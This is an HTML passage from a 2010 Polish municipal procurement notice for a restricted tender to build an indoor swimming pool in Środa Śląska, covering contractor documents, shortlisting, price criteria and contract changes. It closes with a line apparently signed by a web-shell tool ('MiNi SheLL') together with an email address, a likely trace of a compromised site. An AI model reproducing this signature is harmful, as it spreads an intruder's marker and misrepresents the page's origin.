<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wykonawca, który wykaże  się największą ilością  wykonywanych robót budowlanych odpowiadających  przedmiotowi zamówienia, otrzyma  100 pkt. . Pozostali wykonawcy będą oceniani odpowiednio proporcjonalnie mniej w skali 0 - 100 pkt. Do składnia  ofert  zostanie zaproszonych  5 wykonawców.
Lista wykonawców zaproszonych będzie ustalona wg następujących zasad:
a) lista wykonawców będzie tworzona  na podstawie  ilości punktów uzyskanych  za ocenę warunku nr 3
b) w przypadku uzyskania przez wykonawców  równej ilości punktów, o kolejności wykonawców  zadecyduje najwyższa łączną wartość  brutto  robót wymienionych w wykazie  (załącznik  nr 2 - DOŚWIADCZENIE ZAWODOWE ), spełniających  wymagania zamawiającego  (wybudowane  kryte  pływalnie spełniające  wymogi zamawiającego)
Jeżeli liczba  wykonawców, którzy spełniają  warunki udziału w postępowaniu jest  mniejsza niż  5, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w zakresie:
 1. przesunięcia terminu realizacji w następujących sytuacjach: 
1) przestojów i opóźnień zawinionych przez Zamawiającego, 
2) wystąpienia niesprzyjających warunków pogodowych, uniemożliwiających wykonanie robót konstrukcyjnych i zewnętrznych,
 3) przerwania realizacji prac budowlanych przez właściwe organy administracji rządowej, samorządowej bądź prawomocnym wyrokiem sądu, bez winy Wykonawcy.
 4) działania siły wyższej mające bezpośredni wpływ na terminowość wykonywania robót, 
5) wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności np. wystąpienie robót dodatkowych lub zamiennych 
2. zmiany kierownika budowy lub inspektora nadzoru dla poszczególnych branż na wniosek zainteresowanych stron;
 3. zmiany podwykonawcy;
 1) na wniosek Wykonawcy; 
2) na żądanie Zamawiającego.

4. pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1) zmianą obowiązującej stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.srodaslaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Wydział Zamówień Publicznych; 55-300 Środa Śląska , Pl. Wolności 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 10:00, miejsce: Urząd Miejski, Wydział Zamówień Publicznych; 55-300 Środa Śląska , Pl. Wolności 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinasowanie ze środków Funduszu Rozwoju Kultury Fizycznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com